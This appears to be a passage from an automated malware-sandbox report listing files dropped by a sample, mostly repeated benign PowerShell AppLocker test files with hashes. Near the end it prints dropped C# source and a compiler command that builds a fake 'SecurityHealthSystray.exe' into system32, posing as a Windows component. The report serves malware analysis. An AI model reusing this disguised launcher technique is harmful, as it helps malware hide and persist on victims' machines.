                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kt0l3oxy.3lt.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4afasvj.yra.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l5itgopo.pji.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0x0gnr2.mk0.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_muraqn2f.mzw.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mxptamyo.2ls.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrb3rwp3.0tt.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oapagubr.4nn.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3jqyyy2.kf4.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pe0defhf.1hc.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxaykmbt.1g4.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rmhrbdbe.2bi.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ruvaqlcq.5vt.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t1x1byoi.1lb.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u02g41wo.uks.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upocqxa2.0gb.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vperpacl.yez.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vspn2cjg.4hu.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwb0tk2v.xxq.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wxdsl3u0.52d.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x5mlhfkz.4nn.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y24g0xft.3dt.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yl54dnja.hf5.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zech0324.s1c.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmf03omb.x02.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zu3y5qmq.523.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.0.cs

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                  Category:dropped
                                                                  Size (bytes):391
                                                                  Entropy (8bit):4.879608334020313
                                                                  Encrypted:false
                                                                  SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6L2JiFkD:JNVQIbSfhV7TiFkMSfhWL9FkD
                                                                  MD5:C7E0C5546067D85F4C85692676B25DB2
                                                                  SHA1:78654DADFCBE03505A5C6EE969B2BA31ADE3FFEB
                                                                  SHA-256:DF8A3CC81F57FC6FD3AA71B0EF610D68F59F19390F386AB2F4B882EDA064AF14
                                                                  SHA-512:68A767034559126D7F2D554844D2CDED91AA28C7E63DFF469F3994DBE51608858C589D3521B043D76384106F13317C418C6311734B691A9072D42DCEB56ECE19
                                                                  Malicious:false
                                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Steam\steamclient.exe"); } catch { } }).Start();. }.}.

                                                                  C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.cmdline

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):250
                                                                  Entropy (8bit):5.065874272614737
                                                                  Encrypted:false
                                                                  SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fTWm7x:Hu7L//TRq79cQWfqm7x
                                                                  MD5:9125B24C1C1B55FE4CABF0CEB14AE6B8
                                                                  SHA1:AE5923338F360050354C7255D69A937D070EB71E
                                                                  SHA-256:5338E2297D1A1FD137971F9C48C1AD388884E9B1B0327780D2B3BF8E8F3506AB
                                                                  SHA-512:68B29D177517EBA2C46B56ABCAA00CCE5C4A51A0D2A7A3F1E5B2C32552842825F3B2F6265337685C3D00DBB948B54C3A837B84326B60E79E341B476B46F9A048
                                                                  Malicious:true
                                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.0.cs"

                                                                  C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.out

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                  Category:modified
                                                                  Size (bytes):750
                                                                  Entropy (8bit):5.238428097796498
                                                                  Encrypted:false
                                                                  SSDEEP:12:KJN/I/u7L//TRq79cQWfqm7UKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfqm7UKax5DqBVKVrdV
                                                                  MD5:B84933C918492B8FBEE37884F2689C3F
                                                                  SHA1:5247408AD976900604253B3820C7ADF5C61FBBFD
                                                                  SHA-256:AB6D297B63BBFE2D15C7C3A34932740D3B6FC079BF3262509AE4C8A3425555A2
                                                                  SHA-512:A56CFD411694C45D9A99342459EEF5B1E53EA1B3F0FCF69565FE80DA8C84684D5B51BCC1281026BBA21237FAA916045EA3EC46CB4F8CCEF44717DAAEC14A97D5
                                                                  Malicious:false
